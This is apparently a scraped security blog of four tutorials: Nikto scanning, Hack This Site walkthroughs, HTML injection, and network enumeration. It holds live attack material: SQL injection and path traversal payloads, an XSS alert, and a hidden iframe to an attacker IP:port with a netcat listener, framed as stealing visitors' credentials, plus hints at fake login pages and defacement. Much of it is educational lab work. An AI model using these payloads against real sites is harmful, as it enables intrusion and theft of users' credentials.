$

Nikto Vulnerability Scanner

Nikto Vulnerability Scanner 

Nikto is a web server vulnerability assessment tool. Nikto scanner is useful in finding various default and insecure files, 
configurations, and programs on any type of web server. this nikto tutorial will help you in all types of scans in Nikto.


Installation 


Nikto comes previously installed in Kali Linux  if it's not then


apt install nikto 

In windows check this

And in other operating systems use your systems  downloader or use GitHub here.

Operation

For start will going to see what's inside Nikto using simple command 
nikto -h

Nikto
Nikto help


To see more options type 

nikto -H


Now,
we are going to see important commands used in nikto
 First of all will see  how to Scan web servers and websites using Nikto for that we will going to use the command -host


nikto -host (host url or IP address )

In my case I'm using Internal Lightppt webserver to test


nikto -host loacalhost:8001

Scan result

Nikto Vulnerability Scanner
Nikto Vulnerability Scanner

here you can see Nikto found out XSS, outdated server and other vulnerability in a webserver.

Nikto requires a port to scan trough if it's not specified in there Nikto will use port 80 as a default port.

Scanning specified ports in nikto


in nikto we can specify ports using -p (-port) option to scan using port specified. 


nikto -host 127.0.0.1 -p 443
here we are scanning port 443 manually

Scanning multiple ports in nikto 


nikto -host 127.0.0.1 -p 80,84,443

here we are specified multiple ports in scanning using Nikto

 Using Proxy in Nikto Scan


To set the proxy on the command line, use the -useproxy option with the proxy set as the argument 

 nikto -host 127.0.0.1 -useproxy (proxy address:port)


In Nikto scanner, I really recommend using a proxy because as you can see previous image nikto sent over 7000 requests to a web server which is too noisy for them. IDS will block your IP when it will analyze all these requests coming from single Ip.

Mutations in  nikto 



 mutation technique: A mutation will cause Nikto to combine tests or attempt to guess values. These techniques may cause a tremendous amount of tests to be launched against the target. Use the referenced number to specify the type,
 multiple may be used:

 1     Test all files with all root directories
  2     Guess for password file names
   3     Enumerate user names via Apache (/~user type requests)
   4     Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
    5     Attempt to brute force sub-domain names assume that the hostname is the parent domain
   6     Attempt to guess directory names from the supplied dictionary file

Using mutations in Nikto
Using mutations in Nikto




-mutate-options can be used to
Provide extra information for mutates, 
for example. a dictionary file

Output file in nikto

we can use -o command which is -output command used for the output of Nikto in different formats which are.


  -Format+           Save file (-o) format:
                               csv   Comma-separated-value
                               json  JSON Format
                               htm   HTML Format
                               nbe   Nessus NBE format
                               sql   Generic SQL (see docs for schema)
                               txt   Plain text
                               xml   XML Format
                               (if not specified the format will be taken from the file extension passed to -output)


nikto -host <Hostname/IP> -output <filename>

Share:
$

Hack This Site | Info,Walkthrough and Review


Hack This Site | Info, Walkthrough, and Review

HackThisSite.org, normally alluded to as HTS, is an internet hacking and security site established by Jeremy Hammond. The site is kept up by individuals from the network after his departure. 
It intends to furnish clients with an approach to learn and rehearse essential and progressed "hacking" aptitudes through a progression of difficulties in a protected and legitimate condition.

Hack This Site | Info,Walkthrough and Review
In Short, you can demonstrate and learn basic to advanced hacking skills from Hack This Site.

So without wasting time, we are going to dive into Hackthissite.org

The first thing you need to do is register to site.  simple and easy. 


Few features of HTS :

1) Provide real-time hacking scenarios.
2) many articles and feeds on recent technologies, Programming languages, exploits & tutorials.
3) an excellent forum consisting of topics starting from basic to most sophisticated stuff you'll find on the web. Some of the various topics would be Cryptography, Mathematics, Design, Human psychology and far more.
4) Great collection of warez that would be used for private and hosted challenges.
5) Hackthisite IRC, Where you'll meet a number of the foremost talented people on the web.
6) Last but not the least -> Basic challenges, Realistic challenges, JavaScript challenges & all the others which are the base of HTS and keeping it interesting since 2005.

list of challenges we have here...

Hackthissite Challenges
Hackthissite Challenges

here we are going to solve some challenges for better understanding and Fun.

Hack This Site Basic mission 1 

In this simple challenge, our skill of HTML is going to be useful just Inspect that page and find login form you can see there password

Hack This Site Basic Challenge 1
Hack This Site Basic mission 1 



as you can see the password is saved in HTML in there.. easy right..!!
but after every challenge difficulty level increases and become harder to complete challenges

moving on to next challenge


Hack This Site Basic mission 2


Network Security Sam set up a password protection script. He made it load the real password from an unencrypted text file and compare it to the password the user enters. However, he neglected to upload the password file...


This challenge really require some thinking and common sense 

so there is no password file uploaded to check where it is right password or not so any password you will enter give you an incorrect password.. 

but the catch is if we submit a blank password it will not check up and confirm it directly..
 Just submit a blank field and it will show congrats you completed challenge..


Hack this Site Basic mission 3


This time Network Security Sam remembered to upload the password file, but there were deeper problems than that


This time password file is present there we just need to find it. in order to do that we need to inspect the site and find that password file..


Hackthissite basic challenge 3
Hackthissite basic mission 3

after searching for some time I find that file password.php in there..

we just need to open that file adding it to url..

Hackthissite basic challenge 3 password.php
Hackthissite basic mission 3 password.php

as you can see after hitting enter password is directly shown in there just need to copy it and paste it in the password field and hit submit.. and we passed another challenge..

Hack this site basic mission 4

This time Sam hardcoded the password into the script. However, the password is long and complex, and Sam is often forgetful. So he wrote a script that would email his password to him automatically in case he forgot. Here is the script:

This time our developer sam made a script to send him password via email 
we need to find his email address first in order to do so inspect an element and find an email address in HTML tags..

Hack this site basic challenge 4
Hack this site basic challenge 4


after inspecting HTML I found the email address of sam which is sam@hackthissite.org

just need to change this email address with our email address so that the script will send a password to our email address..

now click on that script named send the password to sam and this page will appear

Hack this site basic challenge 4
Hack this site basic challenge 4

and password will be sent to the email we changed simply open that email copy password and paste it in password field hit submit.. and we passed another challenge..


this is some of the basic challenges I wanted to show you there are more to play with.. try to solve those challenges by your own smile will spread on your face after every challenge you passed..
go ahead and take challenges..


Realistic Challenges


Now we are going to see some Realistic challenges which are really fun to solve and test your hacking skills .. 
there are lots of challenges out there but I will show you my favorite 2 challenges
without wasting time lets get into it..

Hack this site realistic mission 2

Hack this site realistic mission 2
Hack this site realistic mission 2

first of all, don't get offended because of this challenge its just a demo site nothing represent here USA or iran..

our goal here is to take down this site..

first, we need to inspect the site to find any useful information to escalate it further..
after inspecting it I found one juicy file which is update.php 

Hack this site realistic mission 2
Hack this site realistic mission 2 page

by adding update.php in URL I found very interesting page there...

yesss.. we found login page but in order to gain access to login page need to find username and password.. right.?

we can hack this login page with an old school manual SQL Injection attack..

to check SQL error need to find perfect payload..

after some trial and error, I found that login page giving error on some post based union queries like 

1=1--  

Hack this site realistic mission 2 login page
Hack this site realistic mission 2 login page

after playing with it I got payload   ' or 1=1--   which is worked perfectly and we got admin access

hence we completed the challenge...


Hack This Site Realistic mission 3

Hack This Site Realistic mission 3
Hack This Site Realistic mission 3

This realistic challenge, we need to recover a poem site which is defaced by some bad hackers.

after opening defaces site we need to Inspect it.

Hack This Site Realistic mission 3 Hacked page
Hack This Site Realistic mission 3 Hacked page

after inspecting that hacked page I found out that green HTML text over there..
which suggests the old site is still up there and backed up at oldindex.html
so we need to find it first 
in order to do that type oldindex.html in the end of URL and hit enter..

Hack This Site Realistic mission 3 oldindex.html
Hack This Site Realistic mission 3 oldindex.html
here we can see that the poem site is still running in background..
now we need to post this page in index.html by submitting this pages source code..
but catch here  We must use our previous path traversal knowledge to place the file in the correct directory.
which means we need to submit it on one directory up to show correctly in the index page..
in  order to do that first copy source code of poem site and click on submit a poem


Hack This Site Realistic mission 3
Hack This Site Realistic mission 3 

here at the name of a poem we need to add directory which is  ../index.html
and paste source code in poem box and add poem..
after this poem will be added on index.hml which is a home page and defaced page get removed automatically...

hence challenge completed= respect+


I had too much fun solving realistic challenge.. must try..
Share:
$

HTML Injection tutorial


HTML Injection


In order to know what HTML injection is first we need to know what HTML is..

HTML is Hyper Text Markup Language It is for the most part being utilized for making sites. Website pages are being sent to the program as HTML reports. At that point, those HTML reports are being changed over into ordinary sites and showed for the last clients.

in this tutorial, we will learn how to do HTML injection practically.

What is HTML Injection?

The substance of this sort of injection attack is injecting HTML code through the vulnerable pieces of the site. The Malicious client sends HTML code through any vulnerable field with a reason to change the web composition or any data, that is shown to the client.
we are going to see types of HTML injection and how to do it.

Types of HTML Injections

  • Reflected HTML Injection
  • Stored HTML Injection

 Reflected HTML Injection


Reflected Injection attack can be performed differently according to the HTTP methods i.e, GET and POST. I would remind, that with POST method data is being sent and with GET method data is being requested.
To know, which method is used for the appropriate website’s elements, we can check the source of the page.

Reflected HTML Injection (GET)

Reflected GET Injection occurs, when our input is being displayed (reflected) on the website. Suppose, we have a simple page with a search form, which is vulnerable to this attack. Then if we would type any HTML code, it will appear on our website and at that instant, it will be injected into the HTML document.

as you can see in the image below


Reflected get injection
Reflected get injection
as we typed HTML tag <h1>html injection</h1> login form its reflecting in the site which means this site is vulnerable to HTML injection.

to find its vulnerable or not just needed any HTML tag to display in it. 


Reflected HTML Injection (POST)

in Reflected GET Injection, It occurs when a malicious HTML code is being sent instead of correct POST method parameters.

it is quite difficult to escalate than GET because POST request sent by a site to the server that's why sometimes we need to tamper data ( firefox addon ) to craft and send POST request to the server. 

Reflected POST Injection
Reflected POST Injection



in this image above HTML code is shown in simple <h1>Hacking Castle</h1>  which displayed in there but its send to server by POST method because it's not the defined parameter. 
we will see how to use tamper data in  next type..



Reflected HTML Injection ( URL )

Reflected URL happens, when HTML code is being sent through the website URL, displayed on the website and at the same time injected to the website’s HTML document.

this time we will be using tamper data to craft URL and send it to server this URL will be shown to other persons visiting the same page. 

in order to do that open tamper data and change URL from there and send requests till they reach to server then stop it.


Editing url in tamper data
Editing URL in tamper data




Reflected url
Reflected URL


as you can see image above link URL is changed to request we crafted using tamper data.
this will be stored in page for other users too so we can escalate many malicious things to get user info
that we going to see in the next type of HTML injection.



Stored HTML Injection

stored injection attack occurs when a malicious HTML code is saved in the web server and is being executed every time when the user calls an appropriate functionality.

Stored HTML Injection


this page contains submit form which stores the input of the user and list  it below but if it is not used parameter in it then it will be injected by HTML tag and vulnerable to HTML Injection

we will be going to use HTML tag

     <h1>Hacking Castle</h1>

  to see its vulnerable or not.

vulnerable to stored HTML Injection
vulnerable to stored HTML Injection

as we can see this HTML tag stored in the page.

lets see another example this time we will use <script>alert("Hacking Castle");</script>
this javascript code will alert the page with popup.

popup.

in the image above we can see it popped up on-page and its also stored in the form it means whenever someone opens that page or refresh it this will pop up there. 

that's the difference between reflected and stored HTML Injection.

so this is about Stored HTML Injection now we are going to see how can we escalate further to steal user informations 


Stealing user Information using HTML Injection

here we are going to use iframe tag and Netcat listener to get useful information.
first, we will be using this iframe tag  

<iframe src="http://(IP:port)/test* height="0" width="0"></iframe>

before hitting submit open Netcat session using terminal and type command 

nc -nvlp (port)

it will open the listener then hit submit and we will get the user credential of anyone who opens that page..

getting user credentials using HTML Injection
getting user credentials using HTML Injection


more ideas to play with


  • HTML is a very good language to play with.  we can make HTML login page with Netcat listener to get users login credentials

  • We have hell lots of HTML code is to deface the site if its vulnerable 

These things I leave up for you guys play with it and have fun.

This cheat sheet will help you with that..
       
 Cheat sheet 


Conclusion


it is observable, that there are unquestionably less writing and data about HTML Injection. Along these lines, analyzers may choose not to play out this sort of testing. Nonetheless, for this situation, HTML attack chances possibly not assessed enough. 

As we have broken down in this instructional exercise, with this kind of Injection the entire plan of your site might be devastated or even the client's login information might be taken. In this way, it is strongly prescribed to incorporate HTML Injection into security testing and contribute great information.


that's all of it about HTML Injection....


Happy Hacking


Share:
$

Enumeration | ethical hacking enumeration techniques

Enumeration | ethical hacking enumeration techniques

Enumeration


Enumeration is defined as the process of extracting user names, machine names, network resources, shares and services from a system. 


In this phase, the attacker creates an active connection to the system and performs directed queries to realize more information about the target. 


The gathered information is employed to spot the vulnerabilities or weak points in system security and tries to take advantage of within the System gaining phase.


Types of information enumerated by an attacker: 

  • Network Resource and shares
  • Users and Groups
  • Routing tables
  • Auditing and Service settings
  • Machine names
  • Applications and banners
  • SNMP and DNS details 


Services and Ports to Enumerate:

TCP 53: DNS Zone Transfer:

DNS zone transfer relies on TCP 53 port instead of UDP 53. The TCP protocol helps to take care of a uniform DNS database between DNS servers. DNS server always uses TCP protocol for the zone transfer.


TCP 137: NetBIOS Name Service (NBNS):

NBNS, also referred to as Windows Internet Name Service (WINS), maintains a database of the NetBIOS names for hosts and therefore the corresponding IP address the host is using.

UDP 161: Simple Network Management Protocol (SNMP):

You can use the SNMP protocol for various devices and applications including firewalls and routers to speak logging and management information with a remote monitoring applications.

TCP/UDP 389: Lightweight Directory Access Protocol (LDAP):

You can use the LDAP Internet protocol, Microsoft Active Directory and also as some email programs to seem up contact information from a server.

TCP 25: Simple Mail Transfer Protocol (SMTP):

SMTP allows email to maneuver across the web and across the local internet. It runs on the connection-oriented service provided by Transmission Control Protocol (TCP) and uses port 25.

We will see each of these ports running the service and how to get information out of it and find any vulnerability and exploits..
.Enumeration,DNS Zone Transfer: , DNS Enumeration,dnsenum , dnsrecon, NetBIOS Enumeration, SNMP Enumeration,LDAP Enumeration
Enumeration in Hacking

1)DNS Enumeration-


         DNS enumeration is that the process of locating all the DNS servers and their corresponding records for a corporation. DNS enumeration will yield usernames, computer names, and IP addresses of potential target systems. The list of DNS records provides a summary of sorts of resource records (database records) stored within the zone files of the name System "DNS". The DNS implements a distributed, hierarchical, and redundant database for information associated with Internet domain names and addresses.

There are lots of tools for DNS enumeration but today I will show you my personal fav.

•dnsenum

DNS subdomain brute-forcing
DNS subdomain brute-forcing

DNS enumeration using dnsenum
DNS enumeration using dnsenum


  • dnsrecon

dnsrecon
dnsrecon


Countermeasures: 

  1. Disable Zone transfer by untrusted hosts
  2. Ensure that private hostnames are not referenced to IP addresses within the DNS zone files of publicly accessible DNS servers.
  3. Use premium registration services.


NetBIOS Enumeration

NetBIOS represents Network Basic Input Output System. It Allows PC correspondence over a LAN and enables them to share records and printers. 




NetBIOS names are used to identify network devices over TCP/IP (Windows). It must be interesting on a system, constrained to 16 characters where 15 characters are utilized for the gadget name and the sixteenth character is held for recognizing the sort of administration running or name record type. 



Aggressors utilize the NetBIOS list to acquire: 


  • Rundown of PCs that have a place with a domain

  • Rundown of offers on the individual has on the system 

  • Strategies and passwords

Tools to NetBIOS Enumeration- nbtscan, nbtstat and alk in one nmap.. 

Here in image nmap nbtstat NSE script is used to enumerate NetBIOS.. 



Nmap NetBIOS script
Nmap NetBIOS script

How to prevent scanning of shared NetBIOS resources

Fortunately for all administrators, there's a  simple solution to defend against unauthorized scanning of NetBIOS shared resources, namely, simply disabling NetBIOS itself. 

There are situations when disabling it can cause malfunctions within the system, for instance, when some obsolete applications completely dependent upon it, but in most cases, rather than these obsolete applications, there are already more advanced solutions and disabling NetBIOS won't harm. 

If you absolutely got to have NetBIOS, then watch out for using default names. In some versions of Windows, C $ or ADMIN $ are well-known names and will be avoided if possible.


  • SNMP Enumeration

SNMP (Simple Network Management Protocol) is an application layer protocol that uses UDP protocol to maintain and manage routers, hubs and switches other network devices on an IP network. SNMP may be a quite common protocol found enabled on a spread of operating systems like Windows Server, Linux & UNIX servers also as network devices like routers, switches, etc.


SNMP enumeration is employed to enumerate user accounts, passwords, groups, system names, devices on a target system.  


for SNMP enumeration best thing to use is Metasploit framework 
need to use snmp_enum module.

msf > use auxiliary/scanner/snmp/snmp_enum msf auxiliary(snmp_enum) > show actions ...actions... msf auxiliary(snmp_enum) > set ACTION < action-name > msf auxiliary(snmp_enum) > show options ...show and set options... msf auxiliary(snmp_enum) > run

Countermeasures:


  1. Remove or disable SNMP agents on hosts
    Block port 161 in the least perimeter network access devices
    Restrict access to specific IP addresses
    Use SNMPv3 (more secure)
    Implement the Group Policy security option called "Additional restrictions for all anonymous connections"
    Access to null session pipes, null session shares, and IPsec filtering should even be restricted


LDAP Enumeration

The Lightweight Directory Access Protocol may be a protocol wont to access directory listings within Active Directory or from other Directory Services. A directory is typically compiled during a hierarchical and logical format, rather just like the levels of management and employees during a company. LDAP tends to be tied into the name System to permit integrated quick lookups and fast resolution of queries. LDAP generally runs on port 389 and like other protocols tends to usually conform to a definite set of rules (RFC's). It is possible to question the LDAP service, sometimes anonymously to work out an excellent deal of data that would glean the tester, valid usernames, addresses, departmental details that would be utilized during a brute force or social engineering attack.

Tools: 

LDAP Admin Tool - http://www.ldapsoft.com

Countermeasures: 

  1. Use NTLM or Basic authentication to limit access to known users only so no one makes unauthorized access.
  2. By default, LDAP traffic is transmitted not so secured 
  3. use SSL technology to encrypt the traffic.
  4. Select a username different from your email address to prevent from attack and enable account lockout after certain entries

Conclusion 


In Scanning, we did scan all ports and found out whats services and its versions are working out there and in this post, we have seen how to enumerate those services and get the information we want to exploit and vulnerability analysis..
So the point here is it's not scanning and enumeration it is scanning with enumeration.

these enumeration techniques used by ethical hackers, bug bounty and cybersecurity experts..

Happy hacking..

Share:
$

Popular Posts

Recent Posts